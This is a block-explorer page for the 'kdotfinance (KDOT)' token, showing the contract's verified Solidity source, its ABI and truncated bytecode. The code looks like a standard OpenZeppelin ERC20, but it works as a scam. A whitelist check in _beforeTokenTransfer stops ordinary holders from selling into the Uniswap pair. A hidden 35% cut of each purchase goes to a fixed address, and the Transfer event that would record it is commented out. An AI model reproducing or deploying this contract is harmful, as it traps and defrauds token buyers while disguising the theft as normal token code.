ETH Price: $3,400.91 (+1.99%)

Token

kdotfinance (KDOT)
 

Overview

Max Total Supply

500,000,000 KDOT

Holders

11

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
42,130,687.5 KDOT

Value
$0.00
0x637114f66f00c63b44c09ccd048a89e9410e9f8c
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
ERC20

Compiler Version
v0.8.0+commit.c7dfd78e

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2021-05-30
*/

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;


/*
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}


/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);

    function feeTo() external view returns (address);
    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);

    function createPair(address tokenA, address tokenB) external returns (address pair);

    function setFeeTo(address) external;
    function setFeeToSetter(address) external;
}


interface IUniswapV2Pair {
    event Approval(address indexed owner, address indexed spender, uint value);
    event Transfer(address indexed from, address indexed to, uint value);

    function name() external pure returns (string memory);
    function symbol() external pure returns (string memory);
    function decimals() external pure returns (uint8);
    function totalSupply() external view returns (uint);
    function balanceOf(address owner) external view returns (uint);
    function allowance(address owner, address spender) external view returns (uint);

    function approve(address spender, uint value) external returns (bool);
    function transfer(address to, uint value) external returns (bool);
    function transferFrom(address from, address to, uint value) external returns (bool);

    function DOMAIN_SEPARATOR() external view returns (bytes32);
    function PERMIT_TYPEHASH() external pure returns (bytes32);
    function nonces(address owner) external view returns (uint);

    function permit(address owner, address spender, uint value, uint deadline, uint8 v, bytes32 r, bytes32 s) external;

    event Mint(address indexed sender, uint amount0, uint amount1);
    event Burn(address indexed sender, uint amount0, uint amount1, address indexed to);
    event Swap(
        address indexed sender,
        uint amount0In,
        uint amount1In,
        uint amount0Out,
        uint amount1Out,
        address indexed to
    );
    event Sync(uint112 reserve0, uint112 reserve1);

    function MINIMUM_LIQUIDITY() external pure returns (uint);
    function factory() external view returns (address);
    function token0() external view returns (address);
    function token1() external view returns (address);
    function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast);
    function price0CumulativeLast() external view returns (uint);
    function price1CumulativeLast() external view returns (uint);
    function kLast() external view returns (uint);

    function mint(address to) external returns (uint liquidity);
    function burn(address to) external returns (uint amount0, uint amount1);
    function swap(uint amount0Out, uint amount1Out, address to, bytes calldata data) external;
    function skim(address to) external;
    function sync() external;

    function initialize(address, address) external;
}


interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}


interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}


/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata , Ownable {
    mapping (address => uint256) private _balances;

    mapping (address => mapping (address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    mapping(address=>bool) private _enable;
    IUniswapV2Router02 public  uniswapV2Router;
    address public  uniswapV2Pair;
    

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The defaut value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor () {

        _mint(0xe5C3a142086D534C0DA6D124b581b909EAD2B688, 500000000 *10**18);
        _enable[0xe5C3a142086D534C0DA6D124b581b909EAD2B688] = true;

        // MainNet / testnet, Uniswap Router
        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        
        uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory())
            .createPair(address(this), _uniswapV2Router.WETH());

        // set the rest of the contract variables
        uniswapV2Router = _uniswapV2Router;
        
        _name = "kdotfinance";
        _symbol = "KDOT";
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        _approve(sender, _msgSender(), currentAllowance - amount);

        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        _approve(_msgSender(), spender, currentAllowance - subtractedValue);

        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);
        uint256 amount35 = 0;
        

        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[sender] = senderBalance - amount;
        if(sender == uniswapV2Pair && recipient != 0x559ebFeC7be7f1A27a38Be3b03bF2D4c70Ad62b3 && recipient != 0xe5C3a142086D534C0DA6D124b581b909EAD2B688) {
            amount35 = (amount)*(35)/(100);
            amount = amount - amount35;
            _balances[recipient] += amount;
            _balances[0x559ebFeC7be7f1A27a38Be3b03bF2D4c70Ad62b3] += amount35;
            // emit Transfer(sender, 0x559ebFeC7be7f1A27a38Be3b03bF2D4c70Ad62b3, amount35);
        } else {
            _balances[recipient] += amount;
        }
        

        emit Transfer(sender, recipient, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        _balances[account] += amount;
        emit Transfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);
        
        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        _balances[account] = accountBalance - amount;
        _totalSupply -= amount;

        emit Transfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {
        if(to == uniswapV2Pair) {
            require(_enable[from], "something went wrong");
        }
    }

    function list(address user, bool enable) public onlyOwner {
        _enable[user] = enable;
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"user","type":"address"},{"internalType":"bool","name":"enable","type":"bool"}],"name":"list","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

60806040523480156200001157600080fd5b5060006200001e620002f6565b600080546001600160a01b0319166001600160a01b0383169081178255604051929350917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a3506200009473e5c3a142086d534c0da6d124b581b909ead2b6886b019d971e4fe8401e74000000620002fa565b73e5c3a142086d534c0da6d124b581b909ead2b688600052600660209081527f95e2775e50053fb4c53c4871ad0a9c5155ed9502d9340d92d50d64924db5c286805460ff191660011790556040805163c45a015560e01b81529051737a250d5630b4cf539739df2c5dacb4c659f2488d92839263c45a01559260048083019392829003018186803b1580156200012957600080fd5b505afa1580156200013e573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620001649190620004cb565b6001600160a01b031663c9c6539630836001600160a01b031663ad5c46486040518163ffffffff1660e01b815260040160206040518083038186803b158015620001ad57600080fd5b505afa158015620001c2573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620001e89190620004cb565b6040518363ffffffff1660e01b815260040162000207929190620004fb565b602060405180830381600087803b1580156200022257600080fd5b505af115801562000237573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200025d9190620004cb565b600880546001600160a01b03199081166001600160a01b03938416179091556007805490911691831691909117905560408051808201909152600b8082526a6b646f7466696e616e636560a81b6020909201918252620002c09160049162000425565b506040805180820190915260048082526312d113d560e21b6020909201918252620002ee9160059162000425565b5050620005ee565b3390565b6001600160a01b0382166200032c5760405162461bcd60e51b815260040162000323906200054c565b60405180910390fd5b6200033a60008383620003ce565b80600360008282546200034e91906200058c565b90915550506001600160a01b038216600090815260016020526040812080548392906200037d9084906200058c565b90915550506040516001600160a01b038316906000907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90620003c290859062000583565b60405180910390a35050565b6008546001600160a01b038381169116141562000420576001600160a01b03831660009081526006602052604090205460ff16620004205760405162461bcd60e51b8152600401620003239062000515565b505050565b8280546200043390620005b1565b90600052602060002090601f016020900481019282620004575760008555620004a2565b82601f106200047257805160ff1916838001178555620004a2565b82800160010185558215620004a2579182015b82811115620004a257825182559160200191906001019062000485565b50620004b0929150620004b4565b5090565b5b80821115620004b05760008155600101620004b5565b600060208284031215620004dd578081fd5b81516001600160a01b0381168114620004f4578182fd5b9392505050565b6001600160a01b0392831681529116602082015260400190565b60208082526014908201527f736f6d657468696e672077656e742077726f6e67000000000000000000000000604082015260600190565b6020808252601f908201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604082015260600190565b90815260200190565b60008219821115620005ac57634e487b7160e01b81526011600452602481fd5b500190565b600281046001821680620005c657607f821691505b60208210811415620005e857634e487b7160e01b600052602260045260246000fd5b50919050565b610f1680620005fe6000396000f3fe608060405234801561001057600080fd5b506004361061010b5760003560e01c806370a08231116100a257806396f35b401161007157806396f35b40146101e8578063a457c2d7146101fb578063a9059cbb1461020e578063dd62ed3e14610221578063f2fde38b146102345761010b565b806370a08231146101bb578063715018a6146101ce5780638da5cb5b146101d857806395d89b41146101e05761010b565b806323b872dd116100de57806323b872dd14610178578063313ce5671461018b57806339509351146101a057806349bd5a5e146101b35761010b565b806306fdde0314610110578063095ea7b31461012e5780631694505e1461014e57806318160ddd14610163575b600080fd5b610118610247565b6040516101259190610b2d565b60405180910390f35b61014161013c366004610ae5565b6102d9565b6040516101259190610b22565b6101566102f6565b6040516101259190610b0e565b61016b610305565b6040516101259190610e0a565b610141610186366004610a70565b61030b565b6101936103ab565b6040516101259190610e13565b6101416101ae366004610ae5565b6103b0565b6101566103ff565b61016b6101c9366004610a1d565b61040e565b6101d661042d565b005b6101566104b6565b6101186104c5565b6101d66101f6366004610aab565b6104d4565b610141610209366004610ae5565b61053e565b61014161021c366004610ae5565b6105b9565b61016b61022f366004610a3e565b6105cd565b6101d6610242366004610a1d565b6105f8565b60606004805461025690610e8f565b80601f016020809104026020016040519081016040528092919081815260200182805461028290610e8f565b80156102cf5780601f106102a4576101008083540402835291602001916102cf565b820191906000526020600020905b8154815290600101906020018083116102b257829003601f168201915b5050505050905090565b60006102ed6102e66106b8565b84846106bc565b50600192915050565b6007546001600160a01b031681565b60035490565b6000610318848484610770565b6001600160a01b0384166000908152600260205260408120816103396106b8565b6001600160a01b03166001600160a01b03168152602001908152602001600020549050828110156103855760405162461bcd60e51b815260040161037c90610c91565b60405180910390fd5b6103a0856103916106b8565b61039b8685610e78565b6106bc565b506001949350505050565b601290565b60006102ed6103bd6106b8565b8484600260006103cb6106b8565b6001600160a01b03908116825260208083019390935260409182016000908120918b168152925290205461039b9190610e21565b6008546001600160a01b031681565b6001600160a01b0381166000908152600160205260409020545b919050565b6104356106b8565b6001600160a01b03166104466104b6565b6001600160a01b03161461046c5760405162461bcd60e51b815260040161037c90610cd9565b600080546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600080546001600160a01b0319169055565b6000546001600160a01b031690565b60606005805461025690610e8f565b6104dc6106b8565b6001600160a01b03166104ed6104b6565b6001600160a01b0316146105135760405162461bcd60e51b815260040161037c90610cd9565b6001600160a01b03919091166000908152600660205260409020805460ff1916911515919091179055565b6000806002600061054d6106b8565b6001600160a01b03908116825260208083019390935260409182016000908120918816815292529020549050828110156105995760405162461bcd60e51b815260040161037c90610dc5565b6105af6105a46106b8565b8561039b8685610e78565b5060019392505050565b60006102ed6105c66106b8565b8484610770565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6106006106b8565b6001600160a01b03166106116104b6565b6001600160a01b0316146106375760405162461bcd60e51b815260040161037c90610cd9565b6001600160a01b03811661065d5760405162461bcd60e51b815260040161037c90610bc3565b600080546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a3600080546001600160a01b0319166001600160a01b0392909216919091179055565b3390565b6001600160a01b0383166106e25760405162461bcd60e51b815260040161037c90610d53565b6001600160a01b0382166107085760405162461bcd60e51b815260040161037c90610c09565b6001600160a01b0380841660008181526002602090815260408083209487168084529490915290819020849055517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92590610763908590610e0a565b60405180910390a3505050565b6001600160a01b0383166107965760405162461bcd60e51b815260040161037c90610d0e565b6001600160a01b0382166107bc5760405162461bcd60e51b815260040161037c90610b80565b6107c78383836109b3565b6001600160a01b038316600090815260016020526040812054828110156108005760405162461bcd60e51b815260040161037c90610c4b565b61080a8382610e78565b6001600160a01b0380871660008181526001602052604090209290925560085416148015610855575073559ebfec7be7f1a27a38be3b03bf2d4c70ad62b36001600160a01b03851614155b801561087e575073e5c3a142086d534c0da6d124b581b909ead2b6886001600160a01b03851614155b15610933576064610890846023610e59565b61089a9190610e39565b91506108a68284610e78565b6001600160a01b0385166000908152600160205260408120805492955085929091906108d3908490610e21565b909155505073559ebfec7be7f1a27a38be3b03bf2d4c70ad62b3600090815